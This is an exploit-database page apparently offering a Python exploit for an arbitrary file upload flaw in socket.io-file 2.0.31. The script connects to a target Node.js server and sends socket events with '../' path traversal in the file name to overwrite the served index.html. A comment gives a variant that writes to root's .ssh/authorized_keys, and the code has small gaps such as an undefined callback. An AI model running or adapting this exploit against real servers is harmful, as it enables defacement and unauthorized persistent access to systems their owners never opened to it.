Exploits / Vulnerability Discovered : 2020-07-26 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Socket.iofile 2.0.31 arbitrary file upload is for educational purposes only and if it is used you will do on your own risk!
import sys
import json
import os
from socketIO_client_nexus import SocketIO, LoggingNamespace
def file_creation(RHOST, RPORT):
print ('Initiating connection...')
with SocketIO(RHOST, RPORT, LoggingNamespace) as socketIO:
print ('Creating file...')
# Example server running in /home/testuser/Documents/socket-app so customize the path appropriately
# Change the "name" option if you want to create an other file in an different path of the system
socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../client/index.html","size":1,"chunkSize":10240,"sent":0,"data":{}})
# Example for server running with root access:
# socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../../../../../root/.ssh/authorized_keys","size":1,"chunkSize":10240,"sent":0,"data":{}})
print ('Writing data to file...')
# Add the data you want to get written to the file
data = "Exploited by Cr0wTom"
json_string = json.dumps(data)
socketIO.once("socket.io-file::request::u_0", on_aaa_response)
socketIO.emit("socket.io-file::stream::u_0", json_string)
def print_usage():
print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')
print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')
print ('Usage: python3 exploit.py <RHOST> <RPORT>')
print ('RHOST The target host IP address or domain.')
print ('RPORT The target host port number of the nodejs server.')
if __name__ == '__main__':
# ensure we have at least an IP and Port
if len(sys.argv) < 3:
print_usage()
sys.exit(1)